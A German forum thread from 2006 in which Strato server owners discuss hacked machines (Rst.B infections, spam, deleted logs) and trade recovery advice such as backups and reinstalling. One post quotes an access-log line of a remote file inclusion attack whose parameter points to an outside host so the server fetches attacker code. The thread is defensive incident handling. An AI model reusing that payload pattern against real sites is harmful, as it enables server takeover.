Server gehackt

[Matthias Casper]

Hallo!

Ich betreibe einen Server mit Suse 9.0 (bei Strato).
AntiVir hast gestern folgende Viren entdeckt:

"auto excluding /proc from scans (is a special fs)
checking drive/path (cwd): /var
/var/tmp/.php2/ss
 Date: 19.06.2006  Time: 16:58:53  Size: 458068
 ALERT: [Linux/Rst.B virus] /var/tmp/.php2/ss <<< Contains signature of
the Linux virus Linux/Rst.B
 file deleted.

/var/tmp/.php2/bscan
 Date: 19.06.2006  Time: 16:58:53  Size: 26804
 ALERT: [Linux/Rst.B virus] /var/tmp/.php2/bscan <<< Contains signature
of the Linux virus Linux/Rst.B
 file deleted.

/var/tmp/.php2/runner
 Date: 19.06.2006  Time: 16:58:53  Size: 22745
 ALERT: [Linux/Rst.B virus] /var/tmp/.php2/runner <<< Contains signature
of the Linux virus Linux/Rst.B file deleted.

/var/tmp/.php2/ssvuln
 Date: 19.06.2006  Time: 16:58:53  Size: 27661
 ALERT: [Linux/Rst.B virus] /var/tmp/.php2/ssvuln <<< Contains signature
of the Linux virus Linux/Rst.B file deleted.

/var/tmp/.php2/cgiscan
 Date: 16.08.2005  Time: 01:50:07  Size: 24971
 ALERT: [Linux/Rst.B virus] /var/tmp/.php2/cgiscan <<< Contains
signature of the Linux virus Linux/Rst.B
 file deleted.

/var/tmp/.php2/pscan2
 Date: 19.06.2006  Time: 16:58:53  Size: 27404
 ALERT: [Linux/Rst.B virus] /var/tmp/.php2/pscan2 <<< Contains signature
of the Linux virus Linux/Rst.B file deleted.

/var/tmp/private/checkroot
 Date: 19.06.2006  Time: 14:30:45  Size: 846833
 ALERT: [SecurityPrivacyRisk/Tool.Sshscan.a
riskware] /var/tmp/private/checkroot <<< Contains signature of the
SecurityPrivacyRisk/Tool.Sshscan.a program
 file deleted.

/var/tmp/private/core
 Date:  7.06.2005  Time: 18:33:27  Size: 999424
 ALERT: [SecurityPrivacyRisk/Tool.Sshscan.a
riskware] /var/tmp/private/core <<< Contains signature of the
SecurityPrivacyRisk/Tool.Sshscan.a program
 file deleted.

/var/tmp/private/pscan2
 Date: 19.06.2006  Time: 14:43:51  Size: 25503
 ALERT: [SecurityPrivacyRisk/Tool.Sshscan.b
riskware] /var/tmp/private/pscan2 <<< Contains signature of the
SecurityPrivacyRisk/Tool.Sshscan.b program
 file deleted.

/var/tmp/private/ss
 Date: 19.06.2006  Time: 15:05:21  Size: 458068
 ALERT: [Linux/Rst.B virus] /var/tmp/private/ss <<< Contains signature
of the Linux virus Linux/Rst.B
 file deleted."

Gleichzeitig haben sich zwei andere Admins beschwert, dass sie Spams erhalten und (wohl ein Skript) mit meiner IP in Form einer Brute Force Attacke eingeht.


Habe die Viren entfernt (scheinen eine backdoor zu installieren, indem sie bin Datein verseuchen. Lagen aber alle in /var).
Nach Chkrootkits gescannt. Ist negativ, wenn auch nicht sehr aussagekräftig.
Die log files sind natürlich weg und auch die shell history wurde natürlich gelöscht.

Habe nun alle Passwörter geändert, /root ebenso, Viren gekillt, Visas ausgestellt, qmail gestoppt (es sind in einer Nacht wohl 8 Giga verschickt worden!).
Werde die Kiste wohl neu aufsetzen müssen, was mir aber etwas "Kopfschmerzen bereitet". Da ich nicht genau weiß wie ich die SQL Datenbanken rette. Ein backup von /home existiert.
Alles ziemlich übel wie ich finde.

 

[Thorsten]

Hallo!

..., was mir aber etwas "Kopfschmerzen bereitet". Da ich nicht genau weiß wie ich die SQL Datenbanken rette.

Das solltest du mittels mysqldump relativ einfach erledigen können.

mfG
Thorsten

 

[Matthias Casper]

aw

Hallo Thorsten,

werde mal wegen "mysqldump" etwa googeln und mich dann morgen an die Arbeit machen.
Ich kann mir vorstellen, dass der Angreifer über ein veraltetete PHP Geschichte eingedrungen ist (phpBB, Coppermine, n_Forum, Typo, usw.)
Habe einige kleinere Webseiten von Freunden/Bekannten gehostet, welche viel PHP verwenden.
Sehr ärgerlich das ganze, aber "Katz und Maus" auf dem Server zu spielen will ich auch nicht.

Danke für Deine Tip,

Matthias

 

[Michi]

MySQL Backup:

mysqldump -u root -p DB_Name > db.sql
--------------------------------------
MySQL Import:

mysql -u root -p DB_Name < db.sql

 

[Matthias Casper]

aw

Danke !


Bekomme komischerweise den apche2 nicht richtig hochgefahren (suse 9.0):

"/ect/init.d/apache start
-bash: /ect/init.d/apache: No such file or directory
h97411:~ # /etc/init.d/apache restart
Shutting down httpd done
Starting httpd [ PHP4 ]

Syntax error on line 8 of /etc/apache2/sysconfig.d/loadmodule.conf:
Cannot load /usr/lib/apache2-prefork/mod_access.so into server: /usr/lib/apache2-prefork/mod_access.so: undefined symbol: ap_get_module_config failed"


Hat jemand dafür eine Lösung?

 

[Silek]

Hallo!

Ich betreibe einen Server mit Suse 9.0 (bei Strato).
[...]
Habe nun alle Passwörter geändert, /root ebenso, Viren gekillt, Visas ausgestellt, qmail gestoppt (es sind in einer Nacht wohl 8 Giga verschickt worden!).
Werde die Kiste wohl neu aufsetzen müssen, was mir aber etwas "Kopfschmerzen bereitet". Da ich nicht genau weiß wie ich die SQL Datenbanken rette. Ein backup von /home existiert.
Alles ziemlich übel wie ich finde.

Ab und zu mal den Server bzgl. Sec-Patches überprüfen:

server1:~ # yast online_update

1und1 hat eigene Update-Server, damit evtl. eigene RPM-Pakete auch zum OS passen.

 

[Silek]

MOD: Full-Quote gekürzt!

Hat jemand dafür eine Lösung?

Ich bin mir jetzt nicht ganz sicher, aber ich glaube, dass in SuSE 9.0 beide Apache vorhanden sind.
Das Modul, weswegen bei der Start nicht funktioniert, läuft nicht unter Apache2. Daher mal den Apache 1.3 starten...

 

[Deathangel]

bei strato haben mehrere derzeit das prob ich auch, habe heute folgende mail erhalten,witz ist nur der server läuft erst seit 3 stunden, und es wurde nichts von mir drauf installiert ,ist also sozusagen ein nackter leerer server der angeblich spammt

> Hallo,
>
> von u.g. Rechner wurde eine Spambotregistrierung in meinem Forum
> probiert. Ich vermute auf dem Rechner wurde eine Botsoftware
> installiert. Ich möchte Sie bitten sich darum zu kümmern.
>
> Viele Grüsse
>
> Matthias Stiller
>
> ---------- Forwarded Message ----------
>
> Subject: Notification of Spam Bot Attempt
> Date: Friday 23 June 2006 21:15
> From: Spam-Bot-Mod@1018-1.1st-housing.de
> To: ms@x1-9.org
>
> Spam Bot Registration Attempted.
>
> Spammer's IP Address = 81.169.141.74
> IP Lookup =
> http://www.nwtools.com/default.asp?prog=express&host=81.169.141.74
> Spammer's Username = kuzametsa
> Spammer's Password = esrvprn
> Spammer's email address = kuzametsa@bluebottle.com
> Spammer's Webpage URL = http://vejewelry.com
> Spammer's Signature Line = gcz
>

 

[ElNino]

/ect/init.d/apache start

versuchs doch mal mit etc/init.d/apache start

 

[Matthias Casper]

aw

Hallo und Danke !!!

Ich habe erstmal pop3d gestoppt.
Aber nach einem "Katz und Maus Spiel" war mich dann doch nicht.
Ich habe den Server neu aufgesetzt, da zwei Ports offen standen welche für brute force attacken verwendet werden und /bin Dateien verseucht waren.
Nun denn ... habe das System neu aufgesetzt, iptables geschrieben,ports dicht gemacht und verlegt, updates eingespielt usw.
Habe alle hoster gebeten ihre Forensoftware zu aktuallisieren.
Dies scheint mir die größte Sicherheitslücke zu sein (phpBB usw.).

Weiß jemand mit welchem Befel ich AntiVir als crontab einrichten kann?

Habe es mal so gemacht ("etc/crontab":

"30 12 * * * root /usr/lib/AntiVir/antivir -s -z -v -del /home"

Bin mir aber unsicher ob dies so stimmig ist.
Weiß da wer was?

@Deathangel Komisch, dass es Dich auch bei einem Strato Server erwischt hat.
Ansonsten werde ich mich mal schlau machen, ob dies ein generelles Problem bei Strato ist ("Hacks in the middle"), oder reiner Zufall.
Mein IP Traffic bestätigt zumindest dass Spam durchgeangen ist und alle log files /bash wurden gelöscht (inkl. log/lastlog usw.)
Ein "nackter Server" ohne Sicherhetsvorkehrungen ist auch ein offenes Scheunentor. Und niemals dem Support ein Passort anvertrauen und /root gleich mittels pswd ändern. Strato stellt ja auf einer Webseite Dein Passwort zur Verfügung. "Traue keinem Informatikstudenten der den Support übernimmt"

Gruß,


Matthias

 

[Back-Up]

Hallo,

mein Server ist nicht mehr zu erreichen und nun schlägt auch der restart von rcapache2 fehl. Hier die Fehlermeldung:

Starting httpd2 (prefork) (98)Address already in use: make_sock: could not bind to address 0.0.0.0:443
no listening sockets available, shutting down
Unable to open logs\n

Ich habe zwar wenig Ahnung von der Bedienung des Servers, aber ich habe mal netstat -nlp ausgeführt. Aufgefallen sind mir die Zeilen:
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 28399/[ehmorgan-dot
tcp 0 0 0.0.0.0:443 0.0.0.0:* LISTEN 28399/[ehmorgan-dot

Ich habe mal nach ehmorgan gegoogled und habe unter anderem eine Homepage gefunden auf der nur steht: Hacked by EHMorgan.net

Falls ich nun Opfer eines Angriffs geworden bin, was ist jetzt zu tun? Ich habe eine Strato root-Server.

 

[marneus]

Und nocheinmal...

Ich habe auch mal ein wenig gegooglet und es sieht ja nicht wirklich gut für Dich aus - um nicht zu sagen sch****!

Wenn Du Zugriff über eine serielle Konsole hast, kannst Du z.B. in Deiner Firewall drop-all von außen eingeben, Deine Webpräsenz/mysql-db sichern und dann den Server neu aufsetzen. Vorher natürlich auch die Logs auswerten und sichern, was da passiert ist und vor allem WIE es passiert ist.

Auch wenn Du keine serielle Konsole hast: Daten sichern, Server platt machen. Ich gehe aber mal davon aus, dass in Deiner Webpräsenz ein Exploit ist, oder aber Dein Server nicht richtig gepatched ist/war. Fragen über Fragen, die uns höchstens Logfiles beantworten können.

 

[Back-Up]

OK. Ich komme noch normal über PuTTY auf meinen Server. Ich kann ebenfalls eine RemoteConsole nutzen. Mir fehlts an Wissen, aber wäre es möglich mir eine kleine Anleitung zu geben, wie ich schonmal das mit der Firewall machen kann?
Soll ich die Firewall über Yast konfigurieren? Im Anhang ein Bild, an dem man mir sagen könnte, was wie geändert werden soll.

Wo finde ich die Logfiles?

 

[Back-Up]

Ich habe in der Logfile folgenden Eintrag gefunden:
85.25.132.134 - - [11/Aug/2006:08:20:15 +0200] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://ehmorgan.net/morgan.dat? HTTP/1.1" 200 16384 "-" "libwww-perl/5.803"

Ich habe noch Zugriff auf alles. Nur die Ports 80 und 443 sind eben irgendwie von diesem Hacker gesperrt. Kann man die Ports wieder freigeben?

 

[charli]

Hallo,

ich würde nicht die serielle Konsole nehmen sondern das Rettungssystem (haben AFAIK alle Strato-Server). Dort zwei Backups packen, einmal komplett und einmal was Du meinst für die Neueinrichtung zu brauchen. Die beiden Backups im Internet lagern (großer Webspace, zweiter Server, zur Not Backupspace von Strato) und den Server über Kundenmenü neuinstallieren lassen.

Mit dem Teilbackup richtest Du die Kiste wieder ein, dabei muß jede Datei geprüft werden ob sie manipuliert wurde. Da die Prüfung sehr aufwändig ist, ist es meistens sinnvoller nichts vom alten Server zu übernehmen sondern die Homepages vom PC neu hochzuladen und die Konfigurationsdateien neu zu editieren.

Das Komplettbackup dient als Sicherheit falls was vergessen wurden, außerdem (nach Download auf den PC) der Fehleranalyse.

 

[Back-Up]

Ich habe Confixx installiert. Wie kann ich die Datenbanken sichern?

 

[charli]

cd /
mysqldump -A > mysqlsicherung

Danach Datei mysqlsicherung ansehen ob es tatsächlich ein Dump ist und nicht nur eine Fehlermeldung daß keiner erstellt werden kann.

 

[Back-Up]

Danke. Wie kann ich die erstellte Datei herunterladen (auf meiner Festplatte speichern) oder auf einen anderen Server schieben? Kann man, wenn man die Datei geöffnet hat (vi DATEI) nicht irgendwie Copy&Paste nutzen?

 

[charli]

Hallo,

am einfachsten über SCP auf den PC holen, dazu WinSCP (WinSCP :: Freeware SFTP and SCP client for Windows) auf dem PC installieren und damit auf den Server verbinden, das geht auch im Rescuesystem.

Nachtrag: wenn Du es über die serielle Konsole machen willst:

cd /
cat mysqlsicherung

dann sprudelt die Datei auf die Konsole.

 

[Back-Up]

Danke, konnte Datenbanken sichern. Da der Server dann wohl neu aufgesetzt wird, habe ich die Möglichkeit zwischen vielen Linux und Administrationsprogrammen zu wählen. Bis jetzt hatte ich SuSe 9.0 in Verbindung mit Confixx, da mir ViSAS überhaupt nicht gefallen hatte und irgendwas gefehlt hatte. Was könnt ihr mir empfehlen? Zu berücksichtigen ist, dass das Linux so einfach zu bedienen ist, wie SuSe 9.0, da ich mit meinen bescheidenen Kenntnissen grad so zurecht gekommen bin.

Hier die Möglichkeiten:
Debian GNU/Linux 3.0 für Profis
Debian GNU/Linux 3.1 für Profis
Fedora Core 3 für Profis
SUSE 10.0 OSS für Profis
SUSE 10.0 OSS inkl. Plesk 8.0
SUSE 9.1 Professional für Profis
SUSE 9.2 Professional für Profis
SUSE 9.3 Professional für Profis
SUSE 9.3 Professional inkl. Plesk 7.5
SUSE 9.3 Professional inkl. ServerAdmin 24
SuSE Linux Professional 8.1 inkl. ViSAS 2.2
SuSE Linux Professional 9.0 inkl. Confixx 3.0
SuSE Linux Professional 9.0 inkl. ViSAS 2.4

Was solls sein?